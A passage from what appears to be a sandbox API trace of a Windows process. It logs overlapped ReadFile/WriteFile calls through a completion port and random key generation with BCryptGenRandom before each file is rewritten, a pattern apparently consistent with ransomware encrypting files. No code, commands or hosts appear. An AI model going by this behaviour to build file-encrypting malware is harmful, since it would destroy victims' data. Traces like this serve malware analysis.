GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.014] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6d20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.029] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.053] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x278b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0077.054] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.066] CloseHandle (hObject=0x3a0) returned 1 [0077.066] free (_Block=0x3d70048) [0077.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.067] WriteFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.134] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xcf4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.146] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2e55, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0077.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.159] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0077.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.160] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0077.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.643] CloseHandle (hObject=0x3ac) returned 1 [0077.643] free (_Block=0x3d70048) [0077.643] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.669] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x3040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.683] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0077.690] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.694] CloseHandle (hObject=0x3ac) returned 1 [0077.695] free (_Block=0x3d70048) [0077.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.696] CloseHandle (hObject=0x3a0) returned 1 [0077.696] free (_Block=0x1ff1e60) [0077.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.716] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0077.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0077.720] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.720] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.720] free (_Block=0x77d800) [0077.720] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0077.720] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0077.721] free (_Block=0x2071f40) [0077.721] free (_Block=0x2072050) [0077.721] free (_Block=0x77d908) [0077.721] WriteFile (in: hFile=0x3bc, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0077.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0077.724] WriteFile (in: hFile=0x3bc, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x227a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0077.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0079.110] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x2661e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0079.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0079.138] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.139] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0079.143] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.143] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.143] free (_Block=0x77d800) [0079.143] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0079.143] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0079.144] free (_Block=0x1ff1930) [0079.144] free (_Block=0x1ff1a40) [0079.144] free (_Block=0x77d908) [0079.144] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0079.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0079.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0079.177] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0079.181] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.181] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.181] free (_Block=0x77d800) [0079.181] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0079.181] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0079.181] free (_Block=0x2071f40) [0079.181] free (_Block=0x2072050) [0079.181] free (_Block=0x77d908) [0079.182] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0079.182] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0079.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0079.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0079.196] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.196] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.196] free (_Block=0x77d800) [0079.196] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0079.196] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0079.196] free (_Block=0x2071f40) [0079.196] free (_Block=0x2072050) [0079.196] free (_Block=0x77d908) [0079.196] WriteFile (in: hFile=0x3c0, lpBuffer=0x3db00ec, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0079.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0079.221] CloseHandle (hObject=0x3ac) returned 1 [0079.221] free (_Block=0x1ff1e60) [0079.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0079.252] CloseHandle (hObject=0x3b8) returned 1 [0079.253] free (_Block=0x2031ed0) [0079.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0080.953] CloseHandle (hObject=0x3b4) returned 1 [0080.954] free (_Block=0x3df0008) [0080.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0080.966] CloseHandle (hObject=0x3c0) returned 1 [0080.966] free (_Block=0x1ff1e60) [0080.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0080.967] CloseHandle (hObject=0x3a0) returned 1 [0080.967] free (_Block=0x3d70048) [0080.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0080.968] CloseHandle (hObject=0x3c4) returned 1 [0080.968] free (_Block=0x1fb18c0) [0080.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.108] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.108] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.108] free (_Block=0x77d800) [0081.108] calloc (_Count=0x41, _Size=0x4) returned 0x3e30078 [0081.108] calloc (_Count=0x82, _Size=0x4) returned 0x3e30188 [0081.108] free (_Block=0x3e30078) [0081.108] free (_Block=0x3e30188) [0081.108] free (_Block=0x77d908) [0081.108] WriteFile (in: hFile=0x3b4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0081.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.304] WriteFile (in: hFile=0x3b4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0081.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.317] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.317] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.317] free (_Block=0x77d800) [0081.317] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.317] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.317] free (_Block=0x1ff1930) [0081.317] free (_Block=0x1ff1a40) [0081.317] free (_Block=0x77d908) [0081.317] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.318] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.319] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.385] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb04, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.385] CloseHandle (hObject=0x3b4) returned 1 [0081.388] free (_Block=0x1fb18c0) [0081.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.399] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.400] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.400] free (_Block=0x77d800) [0081.400] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.400] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.400] free (_Block=0x1ff1930) [0081.400] free (_Block=0x1ff1a40) [0081.400] free (_Block=0x77d908) [0081.400] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.401] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.417] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x5fed, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.418] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.436] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.437] CloseHandle (hObject=0x3b4) returned 1 [0081.440] free (_Block=0x1fb18c0) [0081.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.672] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.673] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.673] LoadLibraryA 